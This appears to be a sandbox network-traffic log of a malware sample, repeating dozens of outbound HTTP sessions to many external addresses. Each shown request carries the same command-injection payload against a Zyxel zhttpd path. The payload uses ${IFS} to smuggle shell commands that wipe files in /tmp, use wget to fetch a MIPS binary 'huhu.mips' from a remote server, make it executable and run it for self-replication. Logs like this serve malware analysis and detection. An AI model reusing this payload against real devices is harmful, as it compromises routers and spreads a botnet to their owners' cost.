                                            Feb 2, 2024 06:21:28.960465908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8585192.168.2.155349441.144.2.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960529089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8586192.168.2.155304657.220.85.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960560083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8587192.168.2.155726298.178.148.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960602999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8588192.168.2.155882493.17.40.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960643053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8589192.168.2.1535658109.248.136.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960664034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8590192.168.2.1550448166.119.111.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960705996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8591192.168.2.1538454201.42.245.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960732937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8592192.168.2.155892895.13.221.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960768938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8593192.168.2.1559376212.135.111.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960822105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8594192.168.2.1534424147.116.26.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960884094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8595192.168.2.1557936163.55.62.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960906029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8596192.168.2.155349012.220.28.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960937977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8597192.168.2.1545208141.223.191.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960978985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8598192.168.2.155440070.30.139.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961034060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8599192.168.2.1536298220.174.248.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961051941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8600192.168.2.1552474204.104.41.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961112976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8601192.168.2.1541096166.76.93.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961150885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8602192.168.2.155715683.159.66.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961210012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8603192.168.2.1550722116.203.128.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961210012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8604192.168.2.156037692.100.211.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961257935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8605192.168.2.155099492.254.76.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961297035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8606192.168.2.1553000148.14.183.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961327076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8607192.168.2.1541338212.44.35.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961400986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8608192.168.2.1554462145.63.17.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961425066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8609192.168.2.1549148166.252.219.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961455107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8610192.168.2.1544894218.56.65.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961483955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8611192.168.2.1542092140.84.209.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961563110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8612192.168.2.1533702220.94.83.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961590052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8613192.168.2.1560730112.159.61.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961618900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8614192.168.2.154274681.73.142.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961662054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8615192.168.2.1534282179.177.139.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961690903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8616192.168.2.1534146169.197.30.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961738110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8617192.168.2.1537800103.37.232.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961801052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8618192.168.2.1534326134.191.217.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961817980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8619192.168.2.1550662204.26.101.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961855888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8620192.168.2.155688246.38.216.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961900949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8621192.168.2.1539964195.203.165.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961935043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8622192.168.2.155551412.114.113.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.961996078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8623192.168.2.154913636.250.109.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962014914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8624192.168.2.1537728222.148.177.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962047100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8625192.168.2.154752462.70.106.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962105036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8626192.168.2.154484819.91.183.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962126017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8627192.168.2.1539364118.100.229.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962155104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8628192.168.2.153524225.232.187.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962193012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8629192.168.2.153280423.232.119.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962229967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8630192.168.2.1558358182.89.51.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962244987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8631192.168.2.1555138133.61.176.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962295055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8632192.168.2.1549644136.57.250.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962327003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8633192.168.2.1538100141.9.20.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962354898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8634192.168.2.1553816111.97.92.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962388992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8635192.168.2.1535602173.222.17.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962400913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8636192.168.2.1539982115.207.213.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962462902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8637192.168.2.1546256195.9.231.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962507010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8638192.168.2.1546732206.222.198.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962527037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8639192.168.2.1547742126.71.26.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962577105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8640192.168.2.1532816178.74.51.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962654114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8641192.168.2.1533018178.99.90.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962692022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8642192.168.2.1533650118.1.140.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962724924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8643192.168.2.1552182104.60.106.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962749958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8644192.168.2.1546848203.152.21.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962800026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8645192.168.2.156021274.222.78.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962841988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8646192.168.2.155165635.13.42.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962879896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8647192.168.2.154313238.71.192.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962901115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8648192.168.2.1543808154.70.183.119443
                                            TimestampBytes transferredDirectionData
